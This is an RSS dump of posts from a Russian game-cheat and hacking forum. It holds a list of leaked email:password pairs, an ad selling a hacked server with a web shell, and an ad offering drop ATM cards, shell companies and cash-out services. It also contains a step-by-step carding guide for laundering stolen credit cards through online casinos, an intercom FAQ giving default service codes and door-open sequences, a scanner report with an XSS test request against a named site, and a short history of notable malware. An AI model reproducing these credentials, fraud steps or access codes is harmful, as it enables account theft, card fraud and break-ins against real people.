http://indogohacker.forumbb.ru/ ПОРТАЛ ЧИТОВ ДЛЯ ИГР ru-ru Sun, 03 Jul 2016 22:31:22 +0300 MyBB/mybb.ru http://indogohacker.forumbb.ru/viewtopic.php?pid=92#p92 <p>Бесплатные скины CS GO <a href="http://goo.gl/h5d0Gp" rel="nofollow" target="_blank">http://goo.gl/h5d0Gp</a></p> mybb@mybb.ru (Вася12) Sun, 03 Jul 2016 22:31:22 +0300 http://indogohacker.forumbb.ru/viewtopic.php?pid=92#p92 http://indogohacker.forumbb.ru/viewtopic.php?pid=91#p91 <p>Слил инфу с кардинг форума<br /><a href="https://youtu.be/vn63Ua9heU4" rel="nofollow" target="_blank">https://youtu.be/vn63Ua9heU4</a><br /><a href="https://www.youtube.com/watch?v=YT9_En-" rel="nofollow" target="_blank">https://www.youtube.com/watch?v=YT9_En-</a> … e=youtu.be</p> mybb@mybb.ru (Вася12) Sun, 03 Jul 2016 22:28:29 +0300 http://indogohacker.forumbb.ru/viewtopic.php?pid=91#p91 http://indogohacker.forumbb.ru/viewtopic.php?pid=90#p90 <p>Боты для игр и.т.п <br />Убедительная просьба не менять пароли=)</p> <p>vam.pizda.ot.ard_2@mail.ru;ardeshniki<br />vam.pizda.ot.ard_3@mail.ru;ardeshniki<br />vam.pizda.ot.ard_4@mail.ru;ardeshniki<br />vam.pizda.ot.ard_5@mail.ru;ardeshniki<br />vam.pizda.ot.ard_6@mail.ru;ardeshniki<br />vam.pizda.ot.ard_7@mail.ru;ardeshniki<br />vam.pizda.ot.ard_8@mail.ru;ardeshniki<br />vam.pizda.ot.ard_9@mail.ru;ardeshniki<br />vam.pizda.ot.ard_10@mail.ru;ardeshniki<br />vam.pizda.ot.ard_11@mail.ru;ardeshniki<br />vam.pizda.ot.ard_12@mail.ru;ardeshniki<br />vam.pizda.ot.ard_13@mail.ru;ardeshniki<br />vam.pizda.ot.ard_14@mail.ru;ardeshniki<br />vam.pizda.ot.ard_15@mail.ru;ardeshniki<br />vam.pizda.ot.ard_16@mail.ru;ardeshniki<br />vam.pizda.ot.ard_17@mail.ru;ardeshniki<br />vam.pizda.ot.ard_18@mail.ru|ardeshniki<br />vam.pizda.ot.ard_19@mail.ru;qwertasdf12<br />vam.pizda.ot.ard_20@mail.ru;qwertasdf12<br />vam.pizda.ot.ard_21@mail.ru;qwertasdf12<br />vam.pizda.ot.ard_22@mail.ru;qwertasdf12<br />vam.pizda.ot.ard_23@mail.ru;qwertasdf12<br />vam.pizda.ot.ard_24@mail.ru;qwertasdf12<br />vam.pizda.ot.ard_25@mail.ru;qwertasdf12<br />vam.pizda.ot.ard_26@mail.ru;ardeshniki<br />vam.pizda.ot.ard_27@mail.ru;ardeshniki<br />utel-100-4@mail.ru;qaqa<br />utel-100-5@mail.ru;qaqa<br />utel-100-6@mail.ru;qaqa<br />utel-100-4@mail.ru;qaqa<br />utel-100-5@mail.ru;qaqa<br />utel-100-6@mail.ru;qaqa<br />utel-100-9@mail.ru;qaqa<br />utel-100-10@mail.ru;qaqa<br />utel-100-12@mail.ru;qaqa<br />utel-100-13@mail.ru;qaqa<br />utel-100-14@mail.ru;qaqa<br />utel-100-15@mail.ru;qaqa<br />utel-100-16@mail.ru;qaqa<br />utel-100-17@mail.ru;qaqa<br />utel-100-18@mail.ru;qaqa<br />utel-100-19@mail.ru;qaqa<br />utel-100-20@mail.ru;qaqa<br />utel-100-21@mail.ru;qaqa<br />utel-100-24@mail.ru;qaqa<br />utel-100-25@mail.ru;qaqa<br />utel-100-26@mail.ru;qaqa<br />utel-100-27@mail.ru;qaqa<br />utel-100-28@mail.ru;qaqa<br />utel-100-29@mail.ru;qaqa<br />utel-100-30@mail.ru;qaqa<br />utel-100-31@mail.ru;qaqa<br />utel-100-32@mail.ru;qaqa<br />utel-100-33@mail.ru;qaqa<br />utel-100-34@mail.ru;qaqa<br />utel-100-35@mail.ru;qaqa<br />utel-100-37@mail.ru;qaqa<br />utel-100-38@mail.ru;qaqa<br />utel-100-39@mail.ru;qaqa<br />utel-100-41@mail.ru;qaqa<br />utel-100-42@mail.ru;qaqa<br />utel-100-43@mail.ru;qaqa<br />utel-100-44@mail.ru;qaqa<br />utel-100-45@mail.ru;qaqa<br />utel-100-46@mail.ru;qaqa<br />utel-100-47@mail.ru;qaqa</p> mybb@mybb.ru (Fokys$s) Sun, 08 Jul 2012 10:30:46 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=90#p90 http://indogohacker.forumbb.ru/viewtopic.php?pid=88#p88 <p>хоть и старый но до сих пор рабочий скрипт для морского боя, даёт возможность стрелять на девять клеток, не разу не подводил, одна проблема надо чистить кеш каждый день ибо игра будет зависать&#160; CCleaner вам в помощь.<br />скачать бесплатно <a href="http://webfile.ru/6029362" rel="nofollow" target="_blank">http://webfile.ru/6029362</a><br />Играть можно ради развлечения, не стоит набирать рейтинг так как&#160; игроки бушуют от удивления и админы очень наблюдательны и обнуляют до стандартного рейтинга 1700 <br />Так-же работаю над скриптом который будет бить сразу на 100 клеток , автор данного скрипта есть но секрета не раскрывает&#160; работаю вроде успешно ждите...</p> mybb@mybb.ru (Fokys$s) Sun, 08 Jul 2012 10:23:51 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=88#p88 http://indogohacker.forumbb.ru/viewtopic.php?pid=87#p87 <p>С помощью данного скрипта вы сможете крутить колесо фортуны каждую минуту, скрипт проверен лично мою к счастью он всё еще актуален!<br />Руководство по установки <br />1.Скачиваете и устанавливаете Сharles (<a href="http://www.charlesproxy.com/download/" rel="nofollow" target="_blank">http://www.charlesproxy.com/download/</a>)<br />2.Скачиваете и устанавливаете Java (для работоспособности Charles), выбираете под свою ОС(операционную систему)<br />3.Заходите в Charles--&gt;Proxy и там ставите галочки напротив Windows Proxy,Mozilla Firefox Proxy и Recording(Session1)<br />4.Затем жмем Tools--&gt;Rewrite, и в открывшемся окне слева жмем Enable Rewrite<br />5.Теперь жмем на кнопку Import и импортируем все скрипты с названиями ____.xml, после жмем Apply--&gt;Ok ( не забудте проверить все ли галочки стоят напротив скриптов)<br />6.Теперь заходим через Firefox в игры mail.ru и наслаждаемся игрой<br />Скачать тут <a href="http://webfile.ru/6029347" rel="nofollow" target="_blank">http://webfile.ru/6029347</a></p> mybb@mybb.ru (Fokys$s) Sun, 08 Jul 2012 10:02:57 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=87#p87 http://indogohacker.forumbb.ru/viewtopic.php?pid=86#p86 <p><a href="http://www.radikal.ru" rel="nofollow" target="_blank"><img class="postimg" loading="lazy" src="http://i081.radikal.ru/1204/b9/312633f8e3b6.jpg" alt="http://i081.radikal.ru/1204/b9/312633f8e3b6.jpg" /></a><br /><a href="http://www.radikal.ru" rel="nofollow" target="_blank"><img class="postimg" loading="lazy" src="http://s019.radikal.ru/i605/1204/b6/bbbb2b8b6996.jpg" alt="http://s019.radikal.ru/i605/1204/b6/bbbb2b8b6996.jpg" /></a><br /><a href="http://www.radikal.ru" rel="nofollow" target="_blank"><img class="postimg" loading="lazy" src="http://s019.radikal.ru/i620/1204/2f/c0f30cb83fff.jpg" alt="http://s019.radikal.ru/i620/1204/2f/c0f30cb83fff.jpg" /></a><br /><a href="http://www.radikal.ru" rel="nofollow" target="_blank"><img class="postimg" loading="lazy" src="http://s019.radikal.ru/i631/1204/9b/789d626375a7.jpg" alt="http://s019.radikal.ru/i631/1204/9b/789d626375a7.jpg" /></a><br /><a href="http://www.radikal.ru" rel="nofollow" target="_blank"><img class="postimg" loading="lazy" src="http://s57.radikal.ru/i157/1204/0a/501cc2a4a4a0.jpg" alt="http://s57.radikal.ru/i157/1204/0a/501cc2a4a4a0.jpg" /></a></p> <p>и еще 11 доменов в зоне рф с общим тицем 7230.</p> <p>- итого суммарный тиц около <span style="color: Red">27 тысяч</span>. <br />- большая часть доменов зарегана давно, есть 97, 98, 99 и тд года<br />- на серваке по многим папкам нельзя определить точный домен сайта, постоянно нахожу через сервисы по определению сайтов на одном ip новые домены. З.Ы. нашел на шелле сервак яндекса<br />- Safe mode: OFF<br />- качалки и архиваторы присутствуют.<br />- в системах учета трафика зарегано только 15-20 сайтов, суммарная посещалка у них более 150к уников в месяц, на остальных неизвестно. <br />- в одни руки, строго через гаранта.</p> <p>- ICQ 245919</p> mybb@mybb.ru (velikiyrim) Wed, 04 Apr 2012 11:52:45 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=86#p86 http://indogohacker.forumbb.ru/viewtopic.php?pid=85#p85 <p>Привет всем я ищу кого нить кто поможет или научит меня созданию таблеток к играм! мой скайп Yarik_956 мой контакт <a href="http://vkontakte.ru/id70169664" rel="nofollow" target="_blank">http://vkontakte.ru/id70169664</a> моя почта S_talker_95@mail.ru! НО ЛУЧШЕ ВСего НА ПИШИТЕ В СкаЙП ну и конечно можете писать сюда на форум!</p> mybb@mybb.ru (VeGaS955) Thu, 01 Dec 2011 19:18:18 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=85#p85 http://indogohacker.forumbb.ru/viewtopic.php?pid=82#p82 <p>всем доброго время суток,у меня вот какой вопрос вчера я&#160; вечером сканировал один сайт прогой XSpide,и получил вот такое Сервер DNS поддерживает рекурсию запросов. При определенных обстоятельствах возможна DoS-атака на сервер. <br /> Решение </p> <p> Разрешить рекурсию только для доверенных адресов. <br /> Ссылки </p> <p> CVE (CVE-1999-0024) : <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0024" rel="nofollow" target="_blank">http://cve.mitre.org/cgi-bin/cvename.cg &#8230; -1999-0024</a> ПОТОМ ИДЕТ ВОТ ТАКОЕ&#160; Доступна информация <br />Список cookie <br /> Описание </p> <p> 1. PHPSESSID=vp84mdore5ehdffi6qt8kjrn33; path=/ <br />2. uno=1; expires=Tue, 31-Jan-2012 04:31:24 GMT; path=/ <br />3. sait=5; expires=Tue, 31-Jan-2012 04:31:24 GMT; path=/ </p> <p>ПОТОМ ВОТ ТАКАЯ ИДЕТ ИНФА&#160; Уязвимость <br />Межсайтовый скриптинг %s <br /> Описание </p> <p> Возможно выполнение атаки межсайтовый скриптинг. Межсайтовый скриптинг (Cross site scripting или XSS) это возможность вставки HTML кода в уязвимую страницу. Инъекция кода осуществляется через все доступные способы ввода информации. Успешное завершение атаки может привести к использованию значений различных переменных, доступных в контексте сайта, записи информации, перехвату пользовательских сессий и т.д. </p> <p>Запрос для выполнения атаки: </p> <p><a href="http://SEXY-VK.RU/register/?idw1=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22" rel="nofollow" target="_blank">http://SEXY-VK.RU/register/?idw1=&quot;&gt;&lt;script&gt;alert('PTsecurity Scanner Test')&lt;/script&gt;&lt;&quot;</a> </p> <p> Решение </p> <p> Запретить использование этого скрипта или программно исправить ошибку. <br /> Ссылки </p> <p> <a href="http://www.cgisecurity.com/articles/xss-faq.shtml" rel="nofollow" target="_blank">http://www.cgisecurity.com/articles/xss-faq.shtml</a> <br /><a href="http://www.cert.org/advisories/CA-2000-02.html" rel="nofollow" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a> <br /><a href="http://support.microsoft.com/default.aspx?scid=kb;EN-US;q252985" rel="nofollow" target="_blank">http://support.microsoft.com/default.as &#8230; US;q252985</a> <br /><a href="http://httpd.apache.org/info/css-security/apache_specific.html" rel="nofollow" target="_blank">http://httpd.apache.org/info/css-securi &#8230; cific.html</a> <br />ОБЪЯСНИТЕ КАК ЭТИМ ПОЛЬЗЫВАТЬСЯ ВСЕМ Я ТОЛЬКО НАЧИНАЮ ПОСТИГАТЬ АЗЫ!!!&#160; &#160;Доступна информация <br />Ссылки с параметрами <br /> Описание </p> <p> Список ссылок найденных на веб-сервере, которые используют какие-либо параметры: </p> <p>/register/?idw1=3242664 </p> <p>/ts.php?p_id=910&amp;lol=5 </p> <p>/register/?idw=3242664 </p> <p>/id/?id=0&amp;f=meets&amp;m=3 </p> <p>/register/?f=friends </p> <p>/register/?send1=1 </p> <p>/register/?send=1 </p> <p>/id/?id=0&amp;idw2=0 </p> <p>/id/?id=0&amp;idw3=0 </p> <p>/id/?id=0&amp;idw1=0 </p> <p>/id/?id=0&amp;idw4=0 </p> <p>/id/?id=0&amp;idw=0 </p> <p>/id/?id=4993558 </p> <p>/cool/?id=12037 </p> <p>/?idw1=1103848 </p> <p>/?idw=1103848 </p> <p>/id/?id=&amp;f=5 </p> <p>/?f=friends </p> <p>/?send1=1 </p> <p>/?send=1 </p> <p>/id/?f=1 </p> <p>/id/?i</p> mybb@mybb.ru (LogDoG80) Fri, 07 Oct 2011 15:12:11 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=82#p82 http://indogohacker.forumbb.ru/viewtopic.php?pid=81#p81 <p>я бы взял твой сайт в свои руки!!! :-)</p> mybb@mybb.ru (LogDoG80) Fri, 07 Oct 2011 14:20:19 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=81#p81 http://indogohacker.forumbb.ru/viewtopic.php?pid=80#p80 <p>Афтору больое спасибо за статейку и скрипты!!! :-)</p> mybb@mybb.ru (LogDoG80) Fri, 07 Oct 2011 14:13:50 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=80#p80 http://indogohacker.forumbb.ru/viewtopic.php?pid=78#p78 <p>Дебетовые ATM карты. В наличии всегда много карт различных банков, таких как Альфа, Сбербанк, ВТБ, Юникредит и др. Все карты в полном комплекте и готовы к работе. Работайте с нами.<br />Юр. Лица. Предоставим для Вашей работы ООО и ИП с открытыми счетами. Беремся за заказы любой сложности.<br />Электронные деньги. Продаем кошельки WM, ЯД, qiwi, РБК любые другие на третьих лиц. Связка кошелек+ ATM карта, для удобного анонимного вывода денег. Покупка электронных денег за нал (только для Москвы). Обналичивание Ваших средств, разблокировка кошельков, перевод средств. Работаем с любыми системами России и мира. Обналичивание средств с сим-карт операторов РФ (не фрод).<br />Доставка заказа в любую точку РФ за наш счет. По Москве курьер.<br />РАБОТАЕМ БЕЗ ПРЕДОПЛАТЫ или через гарантов авторитетных форумов. Денег вперед не просим. Предоставим ссылки на отзывы с уважаемых ресурсов. Контакты: скайп remaker001, icq 246262074, жаббер remaker001@jabber.ru</p> mybb@mybb.ru (l1919s2011) Tue, 27 Sep 2011 15:36:16 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=78#p78 http://indogohacker.forumbb.ru/viewtopic.php?pid=76#p76 <p><strong>-=PRELIATUS=-</strong><br />помоги найти баги в онлайн игре darorbit а то играть нубм надоело</p> mybb@mybb.ru (DeMoN) Sun, 12 Jun 2011 00:23:31 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=76#p76 http://indogohacker.forumbb.ru/viewtopic.php?pid=74#p74 <p>Файлов на обменнике нет&#160; :angry: Ни одного радмина!</p> mybb@mybb.ru (maloir) Mon, 30 May 2011 20:28:49 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=74#p74 http://indogohacker.forumbb.ru/viewtopic.php?pid=73#p73 <p>%-)</p> mybb@mybb.ru (-=Blondex=-) Fri, 13 May 2011 05:07:11 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=73#p73 http://indogohacker.forumbb.ru/viewtopic.php?pid=64#p64 <p>Не буду говорить насчет безопасноти. <br />Просто напомню что она ооочень важна!!! <br />И незщищенным в эту тему лезть черевато!</p> <p>Во вторых не буду расматривать карж stema.</p> <p>В третьих напомню что кардинг - это приступление.</p> <p>Допустим вы достали кредитку.(купили, выпросили, нафишили и т.д.)</p> <p>Расмотрим чо к чему в этом наборе букв и цифр:</p> <p>Erik | Kaymin | 711B Seagirt Av #20L | Metfield |MA|USA | 02052 | 6011002622544211 | 0112 | 825 | <br />&#160; <br />По порядку: <br />1 и 2 – Имя владельца карты <br />3 и 4 и 5 Адрес, город, Штат <br />6 – страна (В данном случае пиндосы) <br />7 – зип код (Аля индекс) <br />8 – НОМЕР КАРТЫ <br />9 – «использовать до» <br />10 – CVV код</p> <p>Тепрь как срубить с нее денег:</p> <p>Идем в онлайн казино (не в зоне ру! желательно какое ни будь амрикосовское) в гугле найдете.</p> <p>далее, заходим на него через прокси штата указаного на картоне. <br />В компе все настройки меняем под тот штат через который заходим (время, страна и тд.) (желательно при этом заходить с виртуального копма, установить на нем анголоизычную версию винды, ну и софт весть на английском(или той страны чья креда))</p> <p>регистрируемся в козено, мыло нужно не взоне ру (например яху.ком), желатьльно очень похожее на мыло указаное в креде.</p> <p>далее переходим на пополнение щета. вбиваем всю инфу что у нас требуют. Подтверждаем(обычно если суммы небольшие(до 500 зеленых) подтвердить можно через майл или вобще могут его неспросить)</p> <p>К нам приходят деньги и начинаем играть!<br />Поднять в казино сумму раза в два в три больше введенной не так уж сложно, тем более когда играешь не на свои)))</p> <p>Переводим обратно на креду сумму которую от туда взяли, остальное выводим на свой щет)))</p> <p>Ну вот впринципе и все))</p> <p>Внимание!!! Статья написана чисто в позновательных целях и не является руководством к действию! Автор не несет ни какой ответствинности за использование этого материала!</p> mybb@mybb.ru (-=PRELIATUS=-) Fri, 01 Apr 2011 17:52:08 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=64#p64 http://indogohacker.forumbb.ru/viewtopic.php?pid=63#p63 <p>Вот стало интересно есть ли способоы на взлом домофона - т.е. Общий Код для входа <br />Или просто для ошибок - (помница набирали цифры в разном порядке и ппц....) <br />Ну всё , что реально знаете про них и про то как шутить прошу отписать. <br />Сорри если это уже обсуждалось - в поиске по разделу фрика ненашел! <br /></p> <p>у меня стоит домофон фирмы Метаком <br />кстати вот щас пока искал - случайно наткнулся на статейку по взлому домофонов - вот: <br />1. Марка домофона - Raikmann. Можешь спать спокойно - такой домофон юный кул-хацкер будет ломать очень долго (до приезда мусоров...). </p> <p>2. Марка домофона - Rainmann. (Rainmann 2000 etc. и другие). Таких домофонов очень и очень много. Во всех новостройках или в тех домах, где меняли домофон, стоят именно эти модели. В принципе они аналоги Raikmann&#180;ов, только подешевле. Вот о них родимых и пойдет речь... Итак по порядку. Нажимаешь кнопочку &quot;ключ&quot; и вводишь 9 8 7 6 5 4 , должен послышаться двойной звуковой сигнал. Затем вводи 1 2 3 4 5 6 , появится буква &quot;P&quot;. Ты вошел в систему управления домофоном. Теперь запоминай: <br />&quot;1&quot; Расширенные настройки домофона, советую самому там не копаться, а просто войти в эту менюшку, и идти попивать пЫво неподалеку. Озадаченные жильцы сделают все за вас. </p> <p>&quot;2&quot; Обычные настройки домофона. </p> <p>&quot;3&quot; Подача сигнала. </p> <p>&quot;4&quot; Блокировка двери. </p> <p>&quot;5&quot; ???? </p> <p>&quot;6&quot; ???? </p> <p>&quot;7&quot; ???? </p> <p>&quot;8&quot; Открыть дверь. </p> <p>&quot;9&quot; ???? </p> <p>Это все конечно хорошо, а что делать если ты пришел домой, а там горит &quot;P&quot;. Ничо страшного - просто нажми &quot;DEL&quot; (в некоторых домофонах &quot;C&quot;), если после &quot;P&quot; горит какая либо цифра, нажми &quot;DEL&quot; + &quot;Эта цифра&quot;. После этого домофон будет работать в обычном режиме. </p> <p>FAQ по взлому домофонов: </p> <p>Q: Как сделать клон трубки? <br />A: Открой корпус трубы, тама стоит нескока джамперов, которые устанавливают номер квартиру, в коророй установлена трубка (актуально для Rainkman). </p> <p>Q: Как войти в сервисное меню домофона Cifral? <br />A: Нажать любую цифру и держать до появления надписи, затем ввести инженерный код. </p> <p>Q: Как войти в системное меню домофона Cifral? <br />A: Нажать звонок и держать до появления надписи, затем ввести инженерный код. </p> <p>Q: Как войти в сервисное меню домофона Rainmann (Rainmann 2000 etc. и другие)? <br />A: Нажимаешь кнопочку «ключ» и вводишь 9 8 7 6 5 4 , должен послышаться двойной звуковой сигнал. Затем вводи 1 2 3 4 5 6 , появится буква P. Ты вошел в систему управления домофоном. Теперь запоминай: <br />1 — Расширенные настройки домофона, советую самому там не копаться, а просто войти в эту менюшку, и идти попивать пЫво неподалеку. Озадаченные жильцы сделают все за вас. <br />2 — Обычные настройки домофона. <br />3 — Подача сигнала. <br />4 — Блокировка двери. <br />5 — ???? <br />6 — ???? (домофон виснет) <br />7 — ???? <br />8 — Открыть дверь. <br />9 — ???? <br />Это действует если только настройки не трогали, вместо 987654 может быть другой код. <br />Пашет на домофонах где на экранчике точка стоит слева. </p> <p>Q: Как войти в сервисное меню домофона VIZIT? <br />A: #999-пикнет 2 раза-(мастер код, по умолчанию 1234)-пикнет 1 раз <br />если код не правильный то пиликнет двух тональным сигналом <br />значения кнопок: <br />1 — ??? <br />2 — Установка индивидуальных кодов для квартир. <br />3 — Программирование ключей для входа. <br />4 — Стирание ключей из памяти. <br />5 — ??? <br />6 — ??? <br />7 — ??? <br />8 — ??? <br />9 — ??? <br />* — Выход из режима. <br /># — Подтверждение установки. </p> <p>Q: Как войти в сервисное меню домофона Eltis? <br />A: Также как в Cifral. </p> <p>Q: Как войти в сервисное меню домофона МЕТАКОМ? <br />A: На клаве набирай 65535 В (или #) далее 1234 В (или #) если все нормально то на дисплее появится [ ]. </p> <p>Q: Как на время вывести из строя домофон с ключом-таблеткой? <br />A: Берем пьезу из электрической зажигалки, и даем разряд в приемник ключа, помогает редко, лучше использовать шокер. </p> <p>Q: Как обнулить память домофона? <br />A: Для этого надо найти откуда запитан домофон, обычно в щитке на первом этаже, там есть небольшой блок, он обычно очень хорошо спрятан, обнулить его просто дайте на 1, 6, 8 и 12м когу +1,5 вольта а -на 2 ногу и память домофона будет чиста как у младенца. <br />Но специалист восстановит это за 5 минут. <br />Также там есть COM-порт, но как его использовать неизвестно. </p> <p>Q: Как открыть дверь домофона Cifral? <br />A: Если в подъезде есть квартиры с номерами 100, 200, 300, 400 и т.д., то можно попробовать ввести: <br />звонок 100 звонок 7272 <br />звонок 200 звонок 7272 <br />звонок 300 звонок 7272 <br />звонок 400 звонок 7272 <br />звонок 500 звонок 7272 <br />звонок 600 звонок 7272 <br />звонок 700 звонок 7272 <br />звонок 800 звонок 7272 <br />звонок 900 звонок 7272 <br />звонок 100 звонок 7273 <br />звонок 200 звонок 7273 <br />звонок 300 звонок 7273 <br />звонок 400 звонок 7273 <br />звонок 500 звонок 7273 <br />звонок 600 звонок 7273 <br />звонок 700 звонок 7273 <br />звонок 800 звонок 7273 <br />звонок 900 звонок 7273 </p> <p>Q: Как еще можно открыть Cifral? <br />A: ВЫЗОВ 41 ВЫЗОВ 1410 <br />Или просто ввести 07054. Иногда помогает. </p> <p>Q: Как можно открыть домофон Eltis? <br />A: B 100 B 7273 <br />В 100 В 2323 <br />Также можно попробовать варианты от Cifral. </p> <p>Q: Как открыть дверь домофона VIZIT? <br />A: Если стандартные настройки не меняли то *#4230 и дверь откроется. <br />Еще иногда помогает 12#345. </p> <p>Q: Как войти в системный режим домофона VIZIT? <br />A: Для входа в системный режим нужно соеденить выводы кабеля «ПРОГРАММИРОВАНИЕ» чаще всего для этого нужно снимать весь блок с двери, потому как данные ваводы не выводят в щиток. </p> <p>Q: Чем отличаются сервисный и системный режим? <br />A: Сервисный и системный режимы разные. Если снять блок с двери и включить системный режим то можно поменять все. Даже мастер код для входа в системный режим. </p> <p>Q: Как записать в память домофона VIZIT свой ключ? <br />A: В режиме програмирования нажмите 3, затем номер хаты, приложите ключ, нажмите # а потом * </p> <p>Q: Какие коды по умолчанию ставят в домофоны? <br />A: 1234, 6767, 3535, 9999, 12345, 0000, 11639 (VIZIT). </p> <p>Q: Как открыть МЕТАКОМ? <br />A: В сервисном меню нажать 8. Также помогает В (или #) 1234567. </p> <p>Q: Сколько мастер ключей может быть у домофона МЕТАКОМ? <br />A: Только 1. </p> <p>Q: Можно ли ключи от домофона магнитом убить, или хоть покалечить? <br />A: Нет, нельзя. </p> <p>Q: Как сменить системный код в домофоне Cifral? <br />A: В режиме програмирования 1 (p----) и вводи новый пасс. </p> <p>Q: Существуют спец-коды домофонов для открытия дверей спец-службами? <br />A: Нет, таких кодов нет. </p> <p>Q: Как записать в память домофона Cifral свой ключ? <br />A: В сервисном режиме нажать 5,затем ввести номер квартиры, домофон напишет TOUCH прикладываем ключ — он в памяти. </p> <p>Q: Как стереть ключ-таблетку из памяти домофона Cifral? <br />A: В сервисном режиме нажать 5, затем ввести номер квартиры, на которую подключен ключ, затем нажать 9. </p> <p>Q: Как записать в память домофона Cifral оптический (плоский с дырками) ключ? <br />A: В системном режиме нажать 5, затем ввести номер ячейки ключа (1, 2, 3), вставить ключ, нажать на звонок. </p> <p>Q: Как сменить общий код домофона Cifral? <br />A: В сервисном меню нажмите 2, затем введите новый код, если код короче 4 цифр, то после ввода нажмите звонок. </p> <p>Q: Как сменить индивидуальный код домофона Cifral? <br />A: В сервисном меню нажмите 3, затем номер квартиры, звонок, введите новый код, звонок, затем пойдет вызов, абонент должен будет дважды нажать на кнопку звонка. </p> <p>Q: Как отключить абонента домофона Cifral? <br />A: В сервисном меню нажмите 4, затем 0, затем номер квартиры, затем звонок. </p> <p>Q: Как подключить абонента, которого отключили от домофона Cifral? <br />A: В сервисном меню нажмите 4, затем 1, затем номер квартиры, затем звонок. </p> <p>Q: Какие настройки по умолчанию домофона Cyfral CCD-2094M? <br />A: Код доступа в режим изменения параметров и настроек 123456. <br />Общий код 1234. <br />Номер таблицы индивидуальных кодов 000. <br />Номер первого абонента 1. <br />Кол-во абонентов, подлежащих обслуживанию 100. <br />Длительность сигнала Z 1. <br />Режим пользования общим кодом ВКЛ. <br />Режим пользования индивидуальным кодами ВКЛ. <br />Абоненты ВКЛ/ВЫКЛ. <br />в список обслуживания Звуковой сигнал №3. <br />Оповещение абонента об открывании двери индивидуальным ключом ВКЛ. </p> <p>Q: На домофоне VIZIT клавишь * и # нет, что делать? <br />A: Есть C и K. С — * K — #. </p> <p>Q: Существует ли системное меню у старых домофонов (с ключом-«палкой»)? <br />A: Нет. </p> <p>Q: Как еще можно открыть двери домофонов? <br />A: Попробуйте закоротить лампочку на подъездном освещении, иногда помогает. <br />Copyright kleoclub.org <br />Хм но всё равно если знаете больше прошу отпоститься тут!</p> mybb@mybb.ru (-=PRELIATUS=-) Fri, 01 Apr 2011 17:50:42 +0400 http://indogohacker.forumbb.ru/viewtopic.php?pid=63#p63 http://indogohacker.forumbb.ru/viewtopic.php?pid=62#p62 <p>История зла 1999-2009</p> <p>САМАЯ НАШУМЕВШАЯ МАЛВАРЬ ЗА ПОСЛЕДНИЕ 10 ЛЕТ<br />Каждый день — новая зараза. С таким разнообразием всевозможной живности появление новой малвари просто перестаешь замечать. И все-таки, были эпидемии, которые не прошли незамечено. Мы решили вспомнить последние 10 лет и выбрать за каждый год наиболее запомнившуюся заразу.</p> <p>Melissa</p> <p>Едва ли программист из Нью-Джерси задумывался о том, чтобы собрать ботнет из миллионов машин и использовать его для рассылки спама. Вряд ли он мог представить последствия, создавая своего, казалось бы, безобидного червя Melissa. Ведь даже распространение тот начинал не с инета — впервые червь был обнаружен 26 марта в конференции alt.sex внутри Usenet — в то время еще популярной сети для общения и обмена файлами. К сообщению был приложен файл List.DOC, содержащий пароли на 80 порнушных сайтов: позарившись на «клубничку», файлик с радостью открыли многие. А дальше пошло-поехало: червь тут же начал распространение, отправляя себя по 50 первым контрактам из записной книжки пользователя. Это был первый успешный червь, распространяемый через e-mail.<br />Когда Melissa открывает зараженный документ MS Word 97/2000, запускается специальный макрос, который рассылает копии червя в сообщениях электронной почты при помощи обычного Outlook’а. Для этого червь юзает возможность Visual Basic активизировать другие приложения MS Windows и использовать их процедуры. Вирус вызывает MS Outlook, считывает из адресной книги первые 50 email’ов и посылает по этим адресам сообщения. Написав в мессаге текст аля «Вот документ, о котором ты меня спрашивал», червь приаттачивал к письму текущий открытый документ пользователя, предварительно заражая его. Последнее, кстати, повлекло за собой массу курьезных ситуаций и, в ряде случаев — утечки конфиденциальной информации. В 1999 году пользователи даже не задумывались о том, что в аттаче от известного им адресата может быть какая-то зараза, и активно открывали вложения.<br />Стремительное распространение вируса серьезно нагрузило почтовые серверы — им пришлось обрабатывать на несколько порядков больше отправлений, чем обычно. Тысячи машин по всему миру не выдержали нагрузки и вышли из строя. К 27 марта распространение вируса приняло характер эпидемии; 29 марта он проник уже на компьютеры всех стран мира, подключенных к Сети, в том числе и на российские.<br />Найденному силами ФБР Девиду Смиту, который и написал те три десятка строк кода на VB, грозили 10 лет тюрьмы, но парень «легко отделался», получив 20 месяцев заключения и штраф в $5000. Однако исходники червя еще долго мусолили хакеры, плодя различные модификации Melissa.</p> <p>весь код Melissa умещался в 100 строчках</p> <p>Loveletter</p> <p>В следующем году — новая почтовая эпидемия, вызванная вирусом Love Letter (или Love Bug). Письма, содержащие незамысловатое ILOVEYOU в строке темы, посыпались на ничего не подозревавших пользователей градом. И все было бы замечательно, если бы к письму не был приложен скриптик на Visual Basic Script, замаскированный под текстовый файл.<br />The Subject: ILOVEYOU<br />Message body: kindly check the<br />attached LOVELETTER coming from me.<br />Attached file: LOVE-LETTER-FORYOU.TXT.vbs<br />На лицо отличный пример социальной инженерии и прием двойного расширения, — что помогло скрыть подлинную природу файла. По умолчанию Винда не показывала второе, настоящее, расширение файла, поэтому принять аттач за обычный текстовик действительно было проще простого. Ну а коль пользователь файл запустил, можно делать свое дело. Написанная с использованием механизма Windows Scripting Host, малварь честно рассылает копии тела по всем адресам из адресной книги почтовой программы MS Outlook, после чего приступает к деструктивной части, закачивая и устанавливая в системе троя. Путь до исполняемого файла прописывался как домашняя страница в параметрах Internet Explorer. Это обеспечивало его автоматическую загрузку, а запуск в системе гарантировал специально созданный ключ в реестре. Далее домашняя страница возвращалась на свое место — и ушастый пользователь даже не замечал изменений. Тем временем, WIN-BUGSFIX.EXE или Microsoftv25.exe честно отправлял автору отснифанные пароли.<br />Трик с использованием двойного расширения 